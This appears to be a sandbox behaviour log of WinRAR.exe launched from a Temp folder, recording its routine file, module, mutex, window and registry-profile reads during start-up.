System Get Time type = Performance Ctr, time = 12519857643 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDllDirectoryW, address_out = 0x77b2d8c0 True 1
Fn
File Add Search Path - True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, base_address = 0x13f160000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS True 1
Fn
Module Get Filename process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.ini, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.ini, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes False 1
Fn
File Create Directory C:\Users\WhuOXYsD\AppData\Roaming\WinRAR True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, base_address = 0x0 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General False 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Create filename = C:\Users\WhuOXYsD\AppData\Local\Temp\winrar.lng, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
File Create filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\winrar.lng, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\riched20.dll, base_address = 0x7fef7980000 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:16 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = VerInfo, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
File Create filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, type = file_type True 1
Fn
File Read filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, size = 4096, size_out = 0 True 1
Fn
File Create filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, type = file_type True 1
Fn
File Write filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, size = 12 True 1
Fn
Data
Mutex Create mutex_name = WinRAR_Busy True 1
Fn
Window Find class_name = WinRarWindow False 1
Fn
Window Create window_name = WinRAR, class_name = WinRarWindow, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
System Get Time type = Local Time, time = 2019-04-02 16:04:16 (Local Time) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR, value_name = rarkey, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = Priority, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR, value_name = rarreg.key, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Settings.reg, type = file_attributes False 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Extraction False 1
Fn
Keyboard Get Info type = KB_CODEPAGE, result_out = 437 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\5 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcName, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileNames False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = UseRAR, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RAR5, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXModule, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFX, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXIcon, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXLogo, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXElevate, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtFile, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtDataWide, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtTextWide, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtTextData, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolumeSize, data = 0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolSizeMod, data = 2, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VolPause, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OldVolNames, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecVolNumber, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Update, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Fresh, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SyncFiles, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Overwrite, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Move, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcRecBin, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcWipe, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WipeIfPassword, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Solid, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Test, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecEnabled, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RecSize, data = 4294967293, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Recovery, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EraseDest, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = AddArcOnly, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ClearArc, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Lock, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Method, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSizeLZ, data = 4194304, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = DictSize, data = 33554432, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PasswordData, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EncryptHeaders, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ZipLegacyEncrypt, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = OpenShared, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ProcessOwners, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveStreams, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveSymLinks, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SaveHardLinks, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Background, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = WaitForOther, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Shutdown, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = GenerateArcName, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = VersionControl, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = BLAKE2, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileCopies, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = QuickOpen, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = GenerateMask, data = yyyymmddhhmmss, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileTimeMode, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileDays, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileHours, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileMinutes, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcTimeOriginal, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcTimeLatest, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = mtime, data = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ctime, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = atime, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsAbs, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsNone, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PathsAbsDrive, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ImmExec, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArc, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
